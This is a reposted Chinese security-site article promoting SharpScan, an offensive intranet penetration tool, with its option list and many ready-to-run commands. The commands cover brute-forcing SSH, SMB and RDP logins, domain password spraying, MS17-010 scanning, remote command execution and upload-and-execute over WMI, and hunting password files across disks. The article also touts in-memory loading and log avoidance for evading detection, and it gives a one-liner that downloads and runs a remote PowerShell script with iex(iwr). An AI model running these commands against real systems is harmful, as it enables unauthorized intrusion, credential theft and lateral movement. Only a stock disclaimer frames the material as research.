【工具分享】内网渗透利器:SharpScan

admin 2025年3月18日22:19:00评论21 views字数 5286阅读17分37秒阅读模式
工具优势

  • C#开发的内网资产扫描器,方便内网横向移动和域内信息收集

  • 参考了Ladon,Fscan、Kscan等扫描器的工作原理

  • 为了兼容更古老的系统,所以采用.NET Framework3.5 和.NET Core6.0开发

  • 使用异步和高并发、扫描速度快并且可控、内存自动回收

  • 用Inline-assembly或者Execute-assembly进行内存加载,做到无文件落地扫描

  • 体积较小(目前800kb)、传输快、自动化扫描+内网信息收集一条龙

  • 尽量遵循OPSEC原则,不创建net.exe、wmi.exe、reg.exe等额外的子进程操,减少日志记录

二,功能展示

【工具分享】内网渗透利器:SharpScan
【工具分享】内网渗透利器:SharpScan
  • 存活探测(Icmp、Arp)

  • 端口扫描(Tcp)、主机信息探测、目标网卡探测

  • 支持NetBios(默认137端口)、SMB(默认445端口)和WMI(默认135端口)服务快速探测

  • 高危漏洞扫描:Eternal Blue(ms17010)、SMBGhost(CVE-2020-0796)、ZeroLogon(CVE-2020-1472)

  • Webtitle探测,指纹识别常见CMS、OA框架

  • 各类服务弱口令爆破、账号密码爆破(SSH、SMB、RDP、FTP),SSH命令执行

  • 探测当前主机.NET版本、操作系统版本信息、杀毒软件/内网设备(AV/EDR/XDR)查询

  • 导出本地RDP登录日志(Rdp端口、Mstsc缓存、Cmdkey缓存、登录成功、失败日志)

  • 判断是否在域内、定位域控IP、信息收集域控的FQDN、域管理员组、域企业管理员组、LDAP查询、域内用户名枚举,密码喷洒(全自动化)

  • 全盘文件搜索,关键字匹配,与Everything的功能相似,适合全盘检索密码本(静默检索、不消耗内存)

  • 携带一个Socks5代理服务器,支持账号密码验证、支持Tcp/IP端口复用

  • 通过Sharpwmi进行内网横向移动,支持文件上传、命令执行(文件上传大小不超过512kb)

  • 将扫描结果导出为txt、md文档

三、兼容性

Windows :支持win7-win11,windows server2008-2022

Linux:支持 glibc 2.17以上 的系统

MacOS: arm x64_x86,intel_x64_86(macOS 10.15以上)
四、使用教程

Usage: SharpScan [OPTIONS]

Options:
  -i, --icmp                 Perform icmp scan
  -a, --arp                  Perform arp scan
  -U, --udp                  Perform udp scan
  -h, --hTarget=VALUE        Target segment to scan
  -p, --ports=VALUE          Ports to scan (e.g. "0-1024" or "80,443,8080")
  -u, --username=VALUE       Username for authentication
      --pw, --password=VALUE Password for authentication
      --uf, --ufile=VALUE    Username file for authentication
      --pwf, --pwdfile=VALUE Password file for authentication
  -m, --mode=VALUE           Mode(e.g. ssh/smb/rdp/ftp/wmiexec/dcom/mysql/mssql/
                               userenum/passwordspray)
  -f, --func=VALUE           wmiexc function(cmd/psh/upload/uploadexec)
  -c, --command=VALUE        Command Execution
  -d, --delay=VALUE          Scan delay(ms),Defalt:10ms
  -t, --thread=VALUE         Maximum num of concurrent scans,Defalt:600
  -s, --search=VALUE         Search all files
  -l, --localfile=VALUE      The local file to upload
  -r, --remotefile=VALUE     The remote file path
      --socks5=VALUE         Open socks5 port
      --http=VALUE           Open SimpleHTTPServer port
      --folder=VALUE         SimpleHTTPServer Folder
      --nopoc                Not using proof of concept(POC)
  -o, --output=VALUE         Output file to save console output
      --help, --show         Show this usage and help

Example:
  SharpScan.exe -help
  SharpScan.exe -h 192.168.1.1/24
  SharpScan.exe -h C:ip.txt
  SharpScan.exe -h 192.168.1.1,192.168.1.3,192.168.1.4
  SharpScan.exe -h 192.168.1.107 -p 100-1024
【工具分享】内网渗透利器:SharpScan
4.1基本用法

【工具分享】内网渗透利器:SharpScan
扫描C段/B段,默认使用所有模块
SharpScan.exe -h 192.168.1.1/24                                  (扫描C段)
SharpScan.exe -h 192.168.1.1/16                                  (扫描B段)
SharpScan.exe -h 192.168.1.107,192.168.1.3,192.168.1.4           (扫描指定IP,用逗号分隔)
SharpScan.exe -h C:\Windows\IP.txt                 (扫描指定IP.txt,格式和账号密码本的格式一样)
SharpScan.exe -h 192.168.1.107 -p 100-1024                     (对单个IP进行端口扫描)

【工具分享】内网渗透利器:SharpScan

【工具分享】内网渗透利器:SharpScan
4.2其他功能

【工具分享】内网渗透利器:SharpScan
SharpScan.exe -h 192.168.244.1/24 -nopoc                             (只做网段主机探测和端口扫描)
SharpScan.exe -s 192.168.244.169 -p 80-1024 -d 0 -m 600              (Tcp端口扫描:80-1024,0延时,最大并发600)
SharpScan.exe -t 192.168.244.141 -U -p 100-10000                     (udp端口扫描:100-10000,10ms延时,最大并发600)
SharpScan.exe -h 192.168.244.1/24 -m ssh -u root -pw a                (C段ssh服务账号密码爆破,账号root,密码a)
SharpScan.exe -h 192.168.244.1/24 -m smb -u administrator -pw a       (C段smb服务账号密码爆破,账号administrator,密码a)
SharpScan.exe -h 192.168.244.1/24 -m rdp -u administrator -pw a      (C段rdp服务账号密码爆破,账号administrator,密码a)
SharpScan.exe -h 192.168.244.1/24 -m smb -uf user.txt -pwf pass.txt   (用账号密码本爆破C段的smb服务)
SharpScan.exe -h 192.168.244.1/24 -m rdp -uf user.txt -pwf pass.txt   (用账号密码本爆破C段的rdp服务)
SharpScan.exe -h 192.168.244.1/24 -m ssh -uf user.txt -pwf pass.txt   (用账号密码本爆破C段的ssh服务()
SharpScan.exe -h 192.168.244.1/24 -m ms17010                           (C段批量扫描是否存在ms17010)
SharpScan.exe -h 192.168.244.1/24 -m ssh -u root -pw a -c "uname-a"   (ssh命令执行C段枚举)
SharpScan.exe -h 192.168.244.1.3 -m wmiexec -f cmd -c "ls C:\Windows"  (远程执行命令,通过注册表传递数据)
SharpScan.exe -h 192.168.244.1.3 -m wmiexec -func upload -l C:a.exe -r C:\Windowsa.exe    (上传文件到远程主机,-l是本地文件路径,-r是上传到远程主机的文件路径)
SharpScan.exe -h 192.168.244.1.3 -m wmiexec -func uploadexec -l C:a.exe -r C:\Windowsa.exe (上传文件到远程主机并且执行文件)
SharpScan.exe -h 192.168.244.1.3 -m userenum -uf user.txt                   (域内枚举用户名)
SharpScan.exe -h 192.168.244.1.3 -m passwordspray -uf user.txt -pw abc123$% (域内密码喷洒)
SharpScan.exe -h 192.168.244.1.3 -m passwordspray -uf user.txt -pwf pass.txt(域内密码喷洒)
SharpScan.exe -s "pass.txt"                                            (全盘静默检索pass.txt)
SharpScan.exe -socks5 8000 -u test -pw 1234                            (Socks5:8000,用户名:test,密码:1234)
SharpScan.exe -h 192.168.244.1/24 -o output.txt                        (将扫描结果导出到output.txt)
【工具分享】内网渗透利器:SharpScan
【工具分享】内网渗透利器:SharpScan
【工具分享】内网渗透利器:SharpScan
4.4功能展示

【工具分享】内网渗透利器:SharpScan

端口扫描:

扫描指定IP(默认使用TCP),端口范围10-1024,0延时,最大并发600,用时3秒

SharpScan.exe -s 192.168.244.169 -p 10-1024 -d 0 -m 600

【工具分享】内网渗透利器:SharpScan

使用UDP协议扫描端口,端口范围100-10000,10ms延时,最大并发600,用时21秒

SharpScan.exe -t 192.168.244.141 -U -p 100-10000

RDP爆破

C段RDP服务账号密码爆破

SharpScan.exe -h 192.168.244.1/24 -m rdp -u administrator -pw a

【工具分享】内网渗透利器:SharpScan

SSH爆破

C段SSH服务账号密码爆破

SharpScan.exe -h 192.168.244.1/24 -m ssh -u root -pw a

【工具分享】内网渗透利器:SharpScan

SSH 命令执行

SharpScan.exe -h 192.168.244.1/24 -m ssh -u root -pw a -c "uname -a"

【工具分享】内网渗透利器:SharpScan

SMB爆破

C段爆破SMB账号密码爆破:

SharpScan.exe -h 192.168.244.1/24 -m smb -u administrator -pw a

【工具分享】内网渗透利器:SharpScan

账号密码本爆破

账号密码本爆破
SSH、SMB、RDP都是同理

SharpScan.exe -h 192.168.244.1/24 -m ssh -uf user.txt -pwf pass.txt


【工具分享】内网渗透利器:SharpScan

【工具分享】内网渗透利器:SharpScan

全盘搜索

搜索本地磁盘上的pass.txt

SharpScan.exe -s "pass.txt"

【工具分享】内网渗透利器:SharpScan

Socks5代理

使用Socks5服务:在当前主机建立一个Socks5服务,端口为8000,用户名为test,密码是1234

SharpScan.exe -socks5 8000 -u test -pw 1234
【工具分享】内网渗透利器:SharpScan

【工具分享】内网渗透利器:SharpScan

在Powershell中使用

您可以将C#程序轻松地转为powershell脚本:Invoke-SharpScan

Import-Module .Invoke-SharpScan.ps1
Invoke-SharpScan -Command "-h 192.168.244.1/24"

【工具分享】内网渗透利器:SharpScan

远程加载powershell

iex(iwr -UseBasicParsing https://raw.githubusercontent.com/INotGreen/SharpScan/main/Powershell/Invoke-SharpScan.ps1);Invoke-SharpScan -Command "-h 192.168.244.1/24"

工具下载

https://github.com/INotGreen/SharpScan
 

原文始发于微信公众号(青萍安全):【工具分享】内网渗透利器:SharpScan

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月18日22:19:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【工具分享】内网渗透利器:SharpScanhttps://cn-sec.com/archives/3816158.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息